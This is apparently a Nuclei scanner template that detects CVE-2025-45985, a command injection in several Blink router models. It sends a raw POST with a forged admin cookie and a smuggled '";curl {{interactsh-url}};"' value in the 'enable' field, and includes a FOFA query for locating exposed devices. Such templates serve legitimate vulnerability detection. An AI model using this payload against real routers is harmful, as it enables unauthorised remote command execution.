id: CVE-2025-45985
info:
name: Blink Router - Command Injection
author: darses
severity: critical
description: |
Blink routers BL-WR9000 V2.4.9 , BL-AC2100_AZ3 V1.0.4, BL-X10_AC8 v1.0.5 , BL-LTE300 v1.2.3, BL-F1200_AT1 v1.0.0, BL-X26_AC8 v1.2.8, BLAC450M_AE4 v4.0.0 and BL-X26_DA3 v1.2.7 were discovered to contain a command injection vulnerability via the bs_SetSSIDHide function.
reference:
- https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_enable%20Unauthorized%20command%20injection/LB-LINK_enable%20command%20injection.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-45985
cwe-id: CWE-77
epss-score: 0.20202
epss-percentile: 0.95316
metadata:
verified: true
max-request: 1
fofa-query: title="B-LINK"
tags: cve,cve2025,b-link,rce,router
http:
- raw:
- |
POST /goform/set_hidessid_cfg HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: {{RootURL}}
Referer: {[RootURL]}/admin/more.html
Cookie: platform=0; user=admin
type=sethide2&enable=";curl {{interactsh-url}};"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"type":'
- '"result":'
condition: and
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: status
status:
- 200
# digest: 4a0a00473045022100b221ff16cabb1b82da35af159436f33425cb1b459f6e6f9f84e3ced17acfbd4602201b0c3adee578686185124f357b1b9f4f1b502117b511870ad8b4566a2619ea92:922c64590222798bb761d5b6d8e72950